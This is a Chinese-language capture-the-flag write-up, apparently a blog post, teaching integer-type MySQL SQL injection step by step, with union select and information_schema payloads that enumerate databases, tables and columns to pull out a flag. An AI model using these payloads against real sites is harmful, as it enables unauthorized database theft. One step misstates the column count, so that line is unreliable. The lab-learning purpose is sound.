本文详细讲述了如何通过整数型注入技巧,利用MySQL的union select漏洞进行数据库操作,包括回显敏感信息、查询表结构、字段名获取和数据查询。关键步骤涉及SQL语句构造和信息提取,适合学习SQL注入和安全防范的读者。
整数型注入:
需要了解mysql的知识点:
union select 联合查询,联合注入常用
database() 回显当前连接的数据库
version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6
group_concat() 把产生的同一分组中的值用,连接,形成一个字符串
information_schema 存了很多mysql信息的数据库
information_schema.schemata information_schema库的一个表,名为schemata
schema_name schemata表中存储mysql所有数据库名字的字段
information_schema.tables 存了mysql所有的表
table_schema tables表中存每个表对应的数据库名的字段
table_name 表的名字和table_schema一一对应
information_schema.columns columns表存了所有的列的信息4
column_name 当你知道一个表的名字时,可通过次字段获得表中的所有字段名(列名)
table_name 表的名字和column_name一一对应
select updatexml(1,concat(0x7e,database(),0x7e),1); 这里注意,只在databse()处改你想要的内容即可报错回显
right(str, num) 字符串从右开始截取num个字符
left(str,num) 同理:字符串从左开始截取num个字符
substr(str,N,M) 字符串,从第N个字符开始,截取M个字符
和一些基本sql语法
和一些基本注释:
#,–空格,/* */
首先开启题目,知道这一题整型注入,
所以不存在引号
于是利用:
1
1 and 1=1
1 and 1=2
去测试是否有sql漏洞
得到:
发现1 和 1 and 1=1,回显相同
而1 and 1=2,没有回显
得出结论,执行了逻辑语句and ,所以有sql漏洞
所以,我们可可以构造sql语句:
1 order by 1
1 order by 2
1 order by 3
查看有几个字段,得到:
发现在1 order by 3 处没有回显,所以只有3个字段
于是就利用 union select 联合注入
这里应为 union 不允许出现重复
所以id要用一个空,我就用:520
构造语句:
520 union select 1,2
可以看到它对我们select 1,2 中的1,2两个字段
进行了回显,所以要传两个字段,这两个字段
可以被执行
所以构造语句:
520 union select user(),version()
看见我们输入的函数被执行了,
于是在构造语句看数据库:
520 union select 1,group_concat(schema_name) from information_schema.schemata limit 1
看到所有数据库名:
在构造语句查看当前数据库名:
520 union select 1,database()
得到当前数据库:sqli
在构造语句查看数据库sqli中的表名:
520 union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘sqli’ limit 1
得到表名,其中flag表为我们想得到的值
于是构造语句查看flag中的字段名:
520 union select 1,group_concat(column_name) from information_schema.columns where table_schema=‘sqli’ and table_name=‘flag’ limit 1
得到字段flag,于是构造语句查询字段:
520 union select 1, group_concat(flag) from sqli.flag limit 1
得到flag:
扫一扫
1175
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
